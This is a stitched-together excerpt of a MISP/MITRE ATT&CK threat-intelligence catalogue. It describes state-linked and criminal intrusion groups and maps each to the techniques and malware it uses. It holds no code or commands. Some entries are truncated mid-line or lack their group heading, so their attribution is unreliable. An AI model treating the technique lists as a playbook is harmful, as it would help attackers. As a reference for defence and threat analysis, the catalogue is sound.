• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="DownPaper - S0186" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"

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</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-illusion">https://www.secureworks.com/research/threat-profiles/cobalt-illusion</a></td>
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</table>
Stolen Pencil - G0086

[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear. (Citation: Netscout Stolen Pencil Dec 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Stolen Pencil - G0086"`

Stolen Pencil - G0086 is also known as:

- Stolen Pencil

Stolen Pencil - G0086 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory" - T1003.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Network Sniffing" - T1040"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Accounts" - T1078.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging" - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Browser Extensions" - T1176"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="PsExec - S0029"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials In Files" - T1552.001"` with estimative-language:likelihood-probability="almost-certain"
Gorgon Group - G0078

[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Gorgon Group - G0078"`

Gorgon Group - G0078 is also known as:

- Gorgon Group

Gorgon Group - G0078 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with `estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with `estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-tool="QuasarRAT - S0262"` with `estimative-language:likelihood-probability="almost-certain"`
probability="almost-certain"


- uses: misp-galaxy:mitre-tool="Remcos - S0332" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="njRAT - S0385" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

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**Bouncing Golf - G0097**

[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="Bouncing Golf - G0097"`

Bouncing Golf - G0097 is also known as:

- **Bouncing Golf**

Bouncing Golf - G0097 has relationships with:

- uses: misp-galaxy:mitre-malware="GolfSpy - S0421" with estimative-language:likelihood-probability="almost-certain"

GOLD SOUTHFIELD - G0115

[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)

The tag is: `misp-galaxy:mitre-intrusion-set="GOLD SOUTHFIELD - G0115"`

GOLD SOUTHFIELD - G0115 is also known as:

- GOLD SOUTHFIELD

GOLD SOUTHFIELD - G0115 has relationships with:

- uses: `misp-galaxy:mitre-malware="REvil - S0496"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
Operation Wocao - G0116

[Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019)

The tag is: *misp-galaxy:mitre-intrusion-set="Operation Wocao - G0116"*

Operation Wocao - G0116 is also known as:

- Operation Wocao

Operation Wocao - G0116 has relationships with:

- uses: *misp-galaxy:mitre-tool="netstat - S0104"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="PowerSploit - S0194"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Impacket - S0357"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Query Registry - T1012"* with estimative-


- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with
estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-tool="dsquery - S0105" with estimative-language:likelihood-probability="almost-certain"


Table 4290. Table References

Links
Fox Kitten - G0117

[Fox Kitten](https://attack.mitre.org/groups/G0117) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering. (Citation: ClearkSky Fox Kitten February 2020) (Citation: CrowdStrike PIONEER KITTEN August 2020) (Citation: Dragos PARISITE) (Citation: ClearSky Pay2Kitten December 2020)

The tag is: *misp-galaxy:mitre-intrusion-set="Fox Kitten - G0117"

Fox Kitten - G0117 is also known as:

- Fox Kitten
- UNC757
- PIONEER KITTEN
- Parisite

Fox Kitten - G0117 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="Ngrok - S0508" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Pay2Key - S0556" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-259a">https://us-cert.cisa.gov/ncas/alerts/aa20-259a</a></td>
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**Indrik Spider - G0119**

[Indrik Spider](https://attack.mitre.org/groups/G0119) is a financially motivated threat group that has leveraged the Dridex banking trojan since at least June 2014 and delivered ransomware variants since 2017. (Citation: Crowdstrike Indrik November 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Indrik Spider - G0119"`

Indrik Spider - G0119 is also known as:

- Indrik Spider

Indrik Spider - G0119 has relationships with:

- uses: `misp-galaxy:mitre-malware="Dridex - S0384"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="Empire - S0363"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="BitPaymer - S0570"` with estimative-language:likelihood-probability="almost-certain"

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Silent Librarian - G0122

[Silent Librarian](https://attack.mitre.org/groups/G0122) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://attack.mitre.org/groups/G0122) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Malwarebytes Silent Librarian October 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Silent Librarian - G0122"

Silent Librarian - G0122 is also known as:

- Silent Librarian
- TA407
- COBALT DICKENS

Silent Librarian - G0122 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004" with estimative-
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**Volatile Cedar - G0123**

[Volatile Cedar](https://attack.mitre.org/groups/G0123) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://attack.mitre.org/groups/G0123) has been operating since 2012 and is motivated by political and ideological interests.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: `misp-galaxy:mitre-intrusion-set="Volatile Cedar - G0123"`

Volatile Cedar - G0123 is also known as:

- Volatile Cedar
- Lebanese Cedar

Volatile Cedar - G0123 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-
 Mustang Panda - G0129

[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among others. (Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)

The tag is: *misp-galaxy:mitre-intrusion-set="Mustang Panda - G0129"

 Mustang Panda - G0129 is also known as:

- Mustang Panda
- TA416
- RedDelta
- BRONZE PRESIDENT

 Mustang Panda - G0129 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/groups/G0129">https://attack.mitre.org/groups/G0129</a></td>
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</table>
APT-C-36 - G0099

[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)

The tag is: *misp-galaxy:mitre-intrusion-set="APT-C-36 - G0099"*

APT-C-36 - G0099 is also known as:

- APT-C-36
- Blind Eagle

APT-C-36 - G0099 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Imminent Monitor - S0434" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4296. Table References
TEMP.Veles - G0088

[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems. (Citation: FireEye TRITON 2019) (Citation: FireEye TEMP.Veles 2018) (Citation: FireEye TEMP.Veles JSON April 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="TEMP.Veles - G0088"`

TEMP.Veles - G0088 is also known as:

- TEMP.Veles
- XENOTIME

TEMP.Veles - G0088 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="PsExec - S0029"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="SSH - T1021.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

